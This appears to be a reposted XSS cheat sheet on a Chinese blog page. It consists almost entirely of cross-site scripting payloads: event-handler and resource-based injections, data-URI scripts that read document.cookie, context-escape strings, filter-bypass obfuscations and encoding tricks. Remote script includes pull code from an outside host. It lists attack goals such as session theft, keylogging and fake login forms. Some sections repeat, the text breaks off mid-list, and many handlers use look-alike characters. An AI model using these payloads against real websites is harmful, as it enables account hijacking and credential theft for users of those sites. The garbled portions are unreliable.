XSS Cheat Sheet
XSS 101
<h1>Hello,<script>alert(1)</script>!</h1>
1. With <script> tag
<script>alert(1)</script>
2. With regular HTML tags
2.1 Event-based
<TAG EVENT=alert(1)>
<body οnlοad=alert(1)>
<img src=1 οnerrοr=alert(1)>
<svg οnlοad=alert(1)>
<x οnmοuseοver=alert(1)>
2.2 Resource-based
<TAG RESOURCE=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>alert(document.domain)</script>
2.1. Steal an user session on the vulnerable website (including admins)
2.2. Capture the keys pressed by the user
2.3. Deface the page, serving any type of content
2.4. Trick the user into giving his/her credentials by means of a fake HTML form
2.5. Crash the browser (local denial of service)
2.6. Force download of files
2.7. Redirect user's browser to another website where his/her machine can be
compromised by memory exploits
data■■■■■■■■
data:[<MIME-type>][;charset=<encoding>][;base64],<data>
<script src="data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script>
<script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
<script src=data:text/html;,alert(document.cookie)></script>
<script src=data:text/html,alert(document.cookie)></script>
<script src=data:,alert(document.cookie)></script>
<script src="data:text/html;base64,YWxlcnQoMSk="></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
<script src=data:text/html;,alert(1)></script>
<script src=data:text/html,alert(1)></script>
<script src=data:,alert(1)></script>
<body><svg><x><script>alert(1)</script></x></svg></body>
<svg><x><script>alert(1)</x>
<svg><a><script>alert(1)</a>
XSS Cheat Sheet
HTML Context Tag Injection
<svg οnlοad=alert(1)>
"><svg οnlοad=alert(1)//
HTML Context Inline Injection
"οnmοuseοver=alert(1)//
"autofocus/οnfοcus=alert(1)//
Javascript Context Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context Code Injection (escaping the escape)
\'-alert(1)//
Javascript Context Tag Injection
</script><svg οnlοad=alert(1)>
PHP_SELF Injection
http://DOMAIN/PAGE.php/"><svg οnlοad=alert(1)>
Without Parenthesis
<svg οnlοad=alert`1`>
<svg οnlοad=alert(1)>
<svg οnlοad=alert(1)>
<svg οnlοad=alert(1)>
Filter Bypass Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
Body Tag
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
<body οnfοcus=alert(1)>
<body οnhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x
<body οnscrοll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body οnresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src οnlοadstart=alert(1)>
<video οnlοadstart=alert(1)><source>
<input autofocus οnblur=alert(1)>
<keygen autofocus οnfοcus=alert(1)>
<form οnsubmit=alert(1)><input type=submit>
<select οnchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x οnshοw=alert(1)>right click me!
Agnostic Event Handlers
<x contenteditable οnblur=alert(1)>lose focus!
<x οnclick=alert(1)>click this!
<x οncοpy=alert(1)>copy this!
<x οncοntextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x οndblclick=alert(1)>double click this!
<x οndrag=alert(1)>drag this!
<x contenteditable οnfοcus=alert(1)>focus this!
<x contenteditable οninput=alert(1)>input here!
<x contenteditable οnkeydοwn=alert(1)>press any key!
<x contenteditable οnkeypress=alert(1)>press any key!
<x contenteditable οnkeyup=alert(1)>press any key!
<x οnmοusedοwn=alert(1)>click this!
<x οnmοusemοve=alert(1)>hover this!
<x οnmοuseοut=alert(1)>hover this!
<x οnmοuseοver=alert(1)>hover this!
<x οnmοuseup=alert(1)>click this!
<x contenteditable οnpaste=alert(1)>paste here!
Agnostic Event Handlers
<brute contenteditable οnblur=alert(1)>lose focus!
<brute οnclick=alert(1)>click this!
<brute οncοpy=alert(1)>copy this!
<brute οncοntextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute οndblclick=alert(1)>double click this!
<brute οndrag=alert(1)>drag this!
<brute contenteditable οnfοcus=alert(1)>focus this!
<brute contenteditable οninput=alert(1)>input here!
<brute contenteditable οnkeydοwn=alert(1)>press any key!
<brute contenteditable οnkeypress=alert(1)>press any key!
<brute contenteditable οnkeyup=alert(1)>press any key!
<brute οnmοusedοwn=alert(1)>click this!
<brute οnmοusemοve=alert(1)>hover this!
<brute οnmοuseοut=alert(1)>hover this!
<brute οnmοuseοver=alert(1)>hover this!
<brute οnmοuseup=alert(1)>click this!
<brute contenteditable οnpaste=alert(1)>paste here!
<brute style=font-size:500px οnmοuseοver=alert(1)>0000
<brute style=font-size:500px οnmοuseοver=alert(1)>0001
<brute style=font-size:500px οnmοuseοver=alert(1)>0002
<brute style=font-size:500px οnmοuseοver=alert(1)>0003
Code Reuse Inline Script
<script>alert(1)//
<script>alert(1)<!–
Code Reuse Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass Generic Tag + Handler
Encoding
<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
Mixed Case
<X onxxx=1
<x OnXxx=1
<X
XSS Cheat Sheet
最新推荐文章于 2023-04-19 09:29:59 发布